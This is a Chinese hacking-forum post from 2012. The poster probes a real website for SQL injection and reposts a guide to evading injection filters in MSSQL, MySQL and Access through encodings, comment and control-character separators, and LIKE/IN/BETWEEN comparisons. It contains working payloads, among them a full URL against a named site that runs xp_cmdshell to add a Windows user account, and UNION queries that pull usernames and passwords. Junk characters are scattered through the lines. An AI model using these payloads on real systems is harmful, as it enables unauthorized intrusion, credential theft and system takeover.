路过这个网站,检测了一下.; d# C- Y8 B V `: \ G
http://www.xxx.cn/Article.asp?ID=117 and 1=1
. \( J2 H( N" o4 v6 Y6 U8 K直接返回主页0 ?0 x$ G: k. ?1 D. k
http://www.xxx.cn/Article.asp?ID=117 or 1=1
1 A$ b' j; s9 U" I% k直接返回主页
# V$ | l0 Y' y! L, fhttp://www.xxx.cn/Article.asp?ID=117 or
0 r# Q4 g8 H3 H7 r _" u3 @& c没有返回主页 没有过滤or
' |& p. t2 k6 _+ T1 C# {http://www.xxx.cn/Article.asp?ID=117 and4 R# A |* I: [1 T3 y4 T4 V6 v
直接返回主页 看来过滤了and) m+ Y8 h, H& \$ F2 p
http://www.xxx.cn/Article.asp?ID=117 or 1
" s0 K7 ]( Y6 y& F没有返回主页 即没有过滤or 也没有过滤1
& B2 ~! f: T) M1 d8 h7 q$ [! Jhttp://www.xxx.cn/Article.asp?ID=117 or 1=1
+ _6 x9 q i2 ^直接返回主页 很明显过滤了等号 4 e: \: D0 y) V' H$ T4 l7 w2 K
or的特性是与and相反的.4 Z1 b5 n' G- v1 Z
or 1=1 爆错 或与原页面不同
4 K: |. L; w ~) M% E& f0 j1 H* O \or 1=2 原页面相同3 G `# g' H& F5 E2 w, l
这样就是一个注入点
6 o- J X" E) Y, H! a, Q但他过滤了=号 我就用><号代替=号吧!& Q4 t# `5 ~2 Y' b2 p0 a% q
or 1<2 很明显是正确的,所以应该与原页面不同* Q% N. G* m" ^2 C8 [8 M7 A( l
or 1>2 很明显是错误的,所以应该与原页面相同" L8 J& I8 c" X4 V, w/ G# {
然后看看有没有过滤其他的查询语句,比如select.& b. p7 j: S1 U* y( A$ w
http://www.xxx.cn/Article.asp?ID=117 select8 g% Y; m; V; A! m/ W6 v
直接返回主页
5 M3 Y8 j7 ~- d! _/ N1 c; \! C( n又迷茫了..3 p: h& } p& ~
$ C6 J" @5 }; C$ H5 P3 c( W
( ~" ^ O0 `( Y% S5 Pcookies注入.和以下的方法全都试过了,都失败了.还有什么方法可以饶过吗& I0 }3 x+ L* Q4 b$ `+ A
这个系统我以为是my动力,后台却是这样的http://www.xxx.cn/admin.asp(应该不是假够台吧)' ?, z$ f9 z, Q
================================================ X6 l% V. p1 l4 q
以下是转贴:
( N0 h6 M% n6 x& [. f
6 V3 N) V' o, M+ v+ a; v9 A, P突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好……
! p c8 G- N& n7 m$ ~3 ^) S经过我的收集,大部分的防注入程序都过滤了以下关键字:
6 G7 E; b+ A. |7 ~/ H" ~+ }and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | = 7 n/ j& S0 s% R: R& m
而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。
2 M% O5 ` w5 E* |2 P& a对于关键字的过滤,以下是我收集的以及我个人的一些想法。 ) s$ _/ D' F5 w, T, `/ x
1、运用编码技术绕过 ( h1 X# R6 u- [- t3 _
如URLEncode编码,ASCII编码绕过。例如or 1=1即
) U: ^, r E9 D%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。
; N& [% s) ?6 i3 M2 k
5 p) R% s& O1 X; [. r9 x% r* A2、通过空格绕过 % @: m. l0 r# a9 I4 \
如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如 & v) C9 W! V0 s. ^/ X! C: Z! o
or’ swords’ =‘swords’
8 K+ _2 M& H7 K: \+ c,由于mssql的松散性,我们可以把or ’swords’ 之间的空格去掉,并不影响运行。 ( {" |( |! K* X: a/ V4 n; Z" G
3、运用字符串判断代替
. p4 U _3 o: u6 [) k5 C5 m' y用经典的or 1=1判断绕过,如 ( |2 h% A% Z( K! b7 |% `
or ’swords’ =’swords’
- w5 q2 b3 f! F8 m: k2 w3 Q,这个方法就是网上在讨论的。
7 q" l5 c) B# _8 r- g4、通过类型转换修饰符N绕过 2 F$ m P: P7 @) n C2 V
可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,如or ’swords’ = N’ swords’ ,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。
) e. V, ~9 z, G, q( M3 F% B5、通过+号拆解字符串绕过 * a" g! j* m# `4 g/ K& U
效果值得考证,但毕竟是一种方法。如 4 U( A" \# d \: X# ]
or ’swords’ =‘sw’ +’ ords’ ;EXEC(‘IN’ +’ SERT INTO ’+’ …..’ )
4 n6 T4 |. O) y, p
& v1 |. a# A4 c0 K, m1 i6、通过LIKE绕过
! [3 ^. w) K' p: K以前怎么就没想到呢?如or 0 R) Y* n" g! i* x- W& L) p/ U
’swords’ LIKE ’sw’
) w' o) y' {2 k- W& ?% T!!!显然可以很轻松的绕过
- Y1 f8 {( c' Z' P* m" x“=”“>” & i5 Z* k0 j8 w7 {( R4 |
的限制……
6 S& Q* \, D' y# e: e/ o7、通过IN绕过
6 T: [3 I* k' k. y0 @与上面的LIKE的思路差不多,如
, c* Y& F: [( K9 l3 X8 K" T3 G6 g. S+ ?or ’swords’ IN (’swords’) 0 y2 O+ J( q9 `4 r
/ o/ Q. ~$ r6 @2 x5 h8、通过BETWEEN绕过 ' B! Y3 B8 n' o+ ]; x# F/ G! A# L
如 V6 O1 n, p8 _4 o6 y' s4 V1 V
or ’swords’ BETWEEN ’rw’ AND ’tw’
( z* I& s! [5 C& w2 U& E! w8 E; P' s. C8 i! M8 c
9、通过>或者<绕过
5 j0 C7 R S0 W" uor ’swords’ > ’sw’ / P$ J% g1 c7 x- F i+ X
or ’swords’ < ’tw’ " O$ y% P( }& U3 b' ~( q s E
or 1<3
c' ~( U/ U/ r3 S…… * v: s/ X% |9 r, G
10、运用注释语句绕过 # G6 H, K" D" b& v6 E0 X/ V" U# o3 E6 B
用/**/代替空格,如: 0 }% T/ e, }* u6 ?
UNION /**/ Select /**/user,pwd,from tbluser
6 Y& \+ u: l+ K4 u
5 G) ^, v$ R% Z t用/**/分割敏感词,如:
4 h7 U: p) P7 A% c8 YU/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser # Z0 h5 X, X+ \- T: u- {8 y
0 j. j2 ?) q+ W11、用HEX绕过,一般的IDS都无法检测出来 5 J- z/ `& j8 c" x; s8 t9 P
0x730079007300610064006D0069006E00 =hex(sysadmin) : M' q2 g, w, B# F) o
0x640062005F006F0077006E0065007200 =hex(db_owner)
7 V+ ]( g0 N$ i: u% x" J: U另外,关于通用点的过滤方法,我们可以考虑采用赋值的方法,例如先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下: 9 ?5 Q1 |4 ?4 I9 Y4 x- x8 O
declare @a sysname 1 z I; u' t& k [- ]; [0 x
select @a=
% d3 C; h7 |# S4 X0 c3 y3 w; W4 s* g exec master.dbo.xp_cmdshell @a 1 i& n4 T. z- R- }
效果 " B' I% U( P1 ~1 T8 R
http://www.ilikeplmm.com/show.asp?id=1;declare%20@a% [email=20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a]20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a[/email];--
9 |. t g- ], {0 n( S+ ?' j5 G3 m o; B2 f& `* @& ^3 e/ t
其中的
3 `3 N+ C0 z S: r: X0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 c5 @3 e6 l6 Z- l k
就是
, S. L. `5 @. T3 i! Y% Z“net user angel pass /add”
& W2 F5 F8 D3 o, u% `, D; o, @* Q0 [+ j* v. {
一直以来都以为只有空格,tab键和注释符/**/可以用来切割sql关键字,段时间在邪八看了风迅cms注入漏洞那篇帖子,才知道原来回车也可以用来作为分割符(以前竟然没有想到,真是失败)。回车的ascii码是chr(13)&chr(10),至于为什么要两个连在一起,这个我也不知道。转换成url编码形式是%0d%0a,于是就可以用%0d%0a代替空格pass一些过滤空格的检查了。
1 z1 ^/ q t+ P; n引申一下,只用%0d能正常执行语句吗?只用%0a呢?测试证明,用任意一种分割在mssql、mysql和access里面都是可以的。6 B3 d" |/ ?2 P7 z1 e
另外,关于mssql的多语句问题。我以前一直以为必须用分号作为语句的结尾,后来发现,完全不是那样。类似) I) J' v0 @9 Q5 w: X; w
Copy code# s6 N1 @+ l2 q0 c5 }6 k, y, m
select * from table exec xp_cmdshell'xxxxxxxxxx'0 m$ ]: f/ v `. j6 E
1 L- W) x2 v. \9 e. p9 F+ b( Y% r2 d2 \
* z; e/ r `1 a6 {% i% r1 `select * from table/**/exec xp_cmdshell'xxxxxxxxxx'
# C# R; B5 u1 h6 X
. j. p* {' {7 ~8 z4 e$ Y1 I, O: H7 y3 k9 o- y. n. e$ b
select * from table|---tab---|exec xp_cmdshell'xxxxxxxxxx'
4 Q- }% O8 f5 [9 m, E+ m
; v2 z- `8 J* J; Y
# G1 k1 d. m( D$ S1 ]select * from table|---enter---|exec xp_cmdshell'xxxxxxxxxx'
( g( T, R7 Y. _) \1 J
9 z. _1 |% ]# f/ V的语句都是可以正常执行的。而我以前竟然一直不知道!不过这个貌似跟连接数据库驱动有关系,odbc可以正常执行,sqloledb的话就会报错。有兴趣的继续研究吧?6 a9 d# K1 \7 a y! q2 o* R2 T
. D4 P* G/ k8 o$ K: O$ q9 Z这样,以后遇到带空格过滤关键字的拦截程序,又可以发挥发挥了: S! Z5 n, \; t4 P
可能大家早就知道了,不管怎么说,发在这里吧!2 {: f, L& X* }4 F! |" U
) T+ P- W" i! y% k: s# ^
最近想起可能还有些ascii码可以用来在sql语句中代替空格,于是写个脚本测试了一下,结果在所有128个低位ascii字符中,chr(12)也可以在access里用,不过貌似chr(12)不能出现在and、or之类的关键词附近,原因不清楚。mysql中比access多一个chr(11)可以。至于mssql,挖日,直接从1到32的ascii码换成字符后都可以正常使用。
; y- Q6 X, R- M. A. f2 k
' K" {1 Q2 X, z- d w: l
5 P+ u; J4 F0 c$ L
1 X8 U, @6 D( x7 v对于中间应该出现空格的地方,用()进行替换,不过,对于很复杂的SQL语句就不太好用了。上面说到的是字符型的,如果是数值型,可以在id=1后加一个括号,不过这个我没有测试,7 W# p, d# m z3 A& F
比如:jmdcw.asp?id=(1)and(select.....),应该是可行的吧? I3 y& m: V8 U' c" h- F
- G4 i$ g: x& t( u0 \$ [ |
发表于 2012-9-15 14:47:46
收藏
支持
反对